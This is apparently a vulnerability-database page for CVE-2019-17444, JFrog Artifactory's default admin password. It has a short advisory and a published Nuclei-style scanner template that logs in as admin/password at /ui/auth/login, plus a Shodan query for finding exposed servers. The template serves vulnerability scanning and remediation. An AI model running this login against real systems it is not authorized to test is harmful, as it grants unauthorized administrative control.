CVE-2019-17444: Jfrog Artifactory <6.17.0 - Default Admin Password

日期: 2025-08-01 | 影响软件: Jfrog Artifactory | POC: 已公开

漏洞描述

Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.

PoC代码[已公开]

id: CVE-2019-17444

info:
  name: Jfrog Artifactory <6.17.0 - Default Admin Password
  author: pdteam
  severity: critical
  description: |
    Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.
  impact: |
    An attacker can gain unauthorized access to the Jfrog Artifactory instance.
  remediation: |
    Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one.
  reference:
    - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes
    - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17444
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17444
    cwe-id: CWE-521
    epss-score: 0.90575
    epss-percentile: 0.99594
    cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: jfrog
    product: artifactory
    framework: "-"
    shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory"
  tags: cve,cve2019,jfrog,default-login,-

http:
  - raw:
      - |
        POST {{path}}/ui/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Origin: {{RootURL}}

        {"user":"admin","password":"password","type":"login"}

    attack: clusterbomb
    payloads:
      path:
        - ""
        - "/artifactory"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":"admin"'
          - '"admin":true'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a811287e7dffe36c3c20e6e71ad752326ce6681f7f48d2e95d949f906c4ebbee022059def37c2e896da779a844a0560519374ab0ffc0fcfde1d7112601be4f04c609:922c64590222798bb761d5b6d8e72950

相关漏洞推荐